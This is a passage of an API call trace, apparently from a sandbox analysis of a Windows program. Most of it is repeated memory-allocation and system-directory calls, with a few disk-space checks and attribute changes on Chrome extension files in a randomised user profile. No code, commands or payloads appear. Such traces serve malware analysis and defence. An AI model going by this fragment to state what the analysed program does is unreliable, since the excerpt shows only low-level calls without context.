lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.420] CoTaskMemFree (pv=0x4e1c10) [0140.420] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.420] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.421] CoTaskMemFree (pv=0x4e1c10) [0140.422] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.422] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.422] CoTaskMemFree (pv=0x4e1c10) [0140.422] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.423] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.423] CoTaskMemFree (pv=0x4e1c10) [0140.424] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.424] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.424] CoTaskMemFree (pv=0x4e1c10) [0140.425] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.425] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.425] CoTaskMemFree (pv=0x4e1c10) [0140.426] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.426] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.426] CoTaskMemFree (pv=0x4e1c10) [0140.427] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.427] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.427] CoTaskMemFree (pv=0x4e1c10) [0140.428] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.428] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.428] CoTaskMemFree (pv=0x4e1c10) [0140.429] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.429] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.429] CoTaskMemFree (pv=0x4e1c10) [0140.431] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.431] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.431] CoTaskMemFree (pv=0x4e1c10) [0140.432] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.432] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.432] CoTaskMemFree (pv=0x4e1c10) [0140.433] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.433] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.433] CoTaskMemFree (pv=0x4e1c10) [0140.434] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.434] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.434] CoTaskMemFree (pv=0x4e1c10) [0140.435] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.435] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.435] CoTaskMemFree (pv=0x4e1c10) [0140.436] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.436] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.436] CoTaskMemFree (pv=0x4e1c10) [0140.436] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.436] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.436] CoTaskMemFree (pv=0x4e1c10) [0140.442] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.450] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0140.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.458] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0140.460] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.465] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html", dwFileAttributes=0x80) returned 1 [0140.468] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.468] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.468] CoTaskMemFree (pv=0x4e1c10) [0140.475] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.475] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.475] CoTaskMemFree (pv=0x4e1c10) [0140.478] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.478] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.478] CoTaskMemFree (pv=0x4e1c10) [0140.481] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.481] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.481] CoTaskMemFree (pv=0x4e1c10) [0140.485] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.485] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.485] CoTaskMemFree (pv=0x4e1c10) [0140.488] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.488] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.488] CoTaskMemFree (pv=0x4e1c10) [0140.492] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.492] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.492] CoTaskMemFree (pv=0x4e1c10) [0140.495] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.495] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.495] CoTaskMemFree (pv=0x4e1c10) [0140.539] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.539] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.539] CoTaskMemFree (pv=0x4e1c10) [0140.542] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.542] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.542] CoTaskMemFree (pv=0x4e1c10) [0140.546] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.546] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.546] CoTaskMemFree (pv=0x4e1c10) [0140.550] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.550] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.550] CoTaskMemFree (pv=0x4e1c10) [0140.553] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.553] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.553] CoTaskMemFree (pv=0x4e1c10) [0140.556] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.556] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.557] CoTaskMemFree (pv=0x4e1c10) [0140.560] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.560] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.560] CoTaskMemFree (pv=0x4e1c10) [0140.563] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.563] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.564] CoTaskMemFree (pv=0x4e1c10) [0140.566] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.566] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.567] CoTaskMemFree (pv=0x4e1c10) [0140.570] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.570] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.570] CoTaskMemFree (pv=0x4e1c10) [0140.573] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.573] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.573] CoTaskMemFree (pv=0x4e1c10) [0140.577] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.577] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.577] CoTaskMemFree (pv=0x4e1c10) [0140.580] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.580] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.580] CoTaskMemFree (pv=0x4e1c10) [0140.584] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.584] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.584] CoTaskMemFree (pv=0x4e1c10) [0140.587] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.587] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.587] CoTaskMemFree (pv=0x4e1c10) [0140.590] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.590] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.591] CoTaskMemFree (pv=0x4e1c10) [0140.594] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.594] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.594] CoTaskMemFree (pv=0x4e1c10) [0140.598] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.598] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.598] CoTaskMemFree (pv=0x4e1c10) [0140.601] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.601] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.601] CoTaskMemFree (pv=0x4e1c10) [0140.605] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.605] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.605] CoTaskMemFree (pv=0x4e1c10) [0140.608] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.608] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.608] CoTaskMemFree (pv=0x4e1c10) [0140.612] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.612] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.612] CoTaskMemFree (pv=0x4e1c10) [0140.615] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.615] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.615] CoTaskMemFree (pv=0x4e1c10) [0140.618] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.618] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.618] CoTaskMemFree (pv=0x4e1c10) [0140.621] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.621] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.621] CoTaskMemFree (pv=0x4e1c10) [0140.625] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.625] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.625] CoTaskMemFree (pv=0x4e1c10) [0140.628] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.628] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.628] CoTaskMemFree (pv=0x4e1c10) [0140.631] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.632] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.632] CoTaskMemFree (pv=0x4e1c10) [0140.634] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.634] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.635] CoTaskMemFree (pv=0x4e1c10) [0140.638] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.638] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.638] CoTaskMemFree (pv=0x4e1c10) [0140.641] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.641] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.641] CoTaskMemFree (pv=0x4e1c10) [0140.644] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.644] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.645] CoTaskMemFree (pv=0x4e1c10) [0140.647] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.647] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.648] CoTaskMemFree (pv=0x4e1c10) [0140.651] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.651] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.651] CoTaskMemFree (pv=0x4e1c10) [0140.654] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.654] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.654] CoTaskMemFree (pv=0x4e1c10) [0140.657] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.657] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.658] CoTaskMemFree (pv=0x4e1c10) [0140.658] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.658] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.658] CoTaskMemFree (pv=0x4e1c10) [0140.659] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.659] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.659] CoTaskMemFree (pv=0x4e1c10) [0140.664] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.679] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png", dwFileAttributes=0x80) returned 1 [0140.681] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.681] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.682] CoTaskMemFree (pv=0x4e1c10) [0140.685] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.685] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.686] CoTaskMemFree (pv=0x4e1c10) [0140.689] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.689] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.689] CoTaskMemFree (pv=0x4e1c10) [0140.692] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.692] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.693] CoTaskMemFree (pv=0x4e1c10) [0140.696] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.696] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.696] CoTaskMemFree (pv=0x4e1c10) [0140.700] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.700] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.700] CoTaskMemFree (pv=0x4e1c10) [0140.703] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.703] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.703] CoTaskMemFree (pv=0x4e1c10) [0140.706] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.707] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.707] CoTaskMemFree (pv=0x4e1c10) [0140.710] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.710] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.710] CoTaskMemFree (pv=0x4e1c10) [0140.713] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.713] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.714] CoTaskMemFree (pv=0x4e1c10) [0140.724] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.724] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.724] CoTaskMemFree (pv=0x4e1c10) [0140.727] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.727] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.728] CoTaskMemFree (pv=0x4e1c10) [0140.731] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.731] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.731] CoTaskMemFree (pv=0x4e1c10) [0140.735] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.735] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.735] CoTaskMemFree (pv=0x4e1c10) [0140.738] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.738] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.738] CoTaskMemFree (pv=0x4e1c10) [0140.742] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.742] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.742] CoTaskMemFree (pv=0x4e1c10) [0140.745] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.745] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.745] CoTaskMemFree (pv=0x4e1c10) [0140.749] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.749] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.749] CoTaskMemFree (pv=0x4e1c10) [0140.752] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.752] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.752] CoTaskMemFree (pv=0x4e1c10) [0140.756] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.756] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.756] CoTaskMemFree (pv=0x4e1c10) [0140.759] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.759] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.759] CoTaskMemFree (pv=0x4e1c10) [0140.763] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.763] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.763] CoTaskMemFree (pv=0x4e1c10) [0140.766] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.766] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.766] CoTaskMemFree (pv=0x4e1c10) [0140.770] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.770] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.770] CoTaskMemFree (pv=0x4e1c10) [0140.773] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.773] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.773] CoTaskMemFree (pv=0x4e1c10) [0140.777] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.777] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.777] CoTaskMemFree (pv=0x4e1c10) [0140.780] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.780] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.780] CoTaskMemFree (pv=0x4e1c10) [0140.783] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.783] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.784] CoTaskMemFree (pv=0x4e1c10) [0140.786] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.786] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.787] CoTaskMemFree (pv=0x4e1c10) [0140.790] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.790] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.790] CoTaskMemFree (pv=0x4e1c10) [0140.793] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.793] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.794] CoTaskMemFree (pv=0x4e1c10) [0140.800] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.800] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.800] CoTaskMemFree (pv=0x4e1c10) [0140.803] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.803] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.803] CoTaskMemFree (pv=0x4e1c10) [0140.806] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.807] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.807] CoTaskMemFree (pv=0x4e1c10) [0140.810] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.810] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.810] CoTaskMemFree (pv=0x4e1c10) [0140.814] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.814] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.814] CoTaskMemFree (pv=0x4e1c10) [0140.817] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.817] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.817] CoTaskMemFree (pv=0x4e1c10) [0140.822] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.822] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.822] CoTaskMemFree (pv=0x4e1c10) [0140.825] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.825] 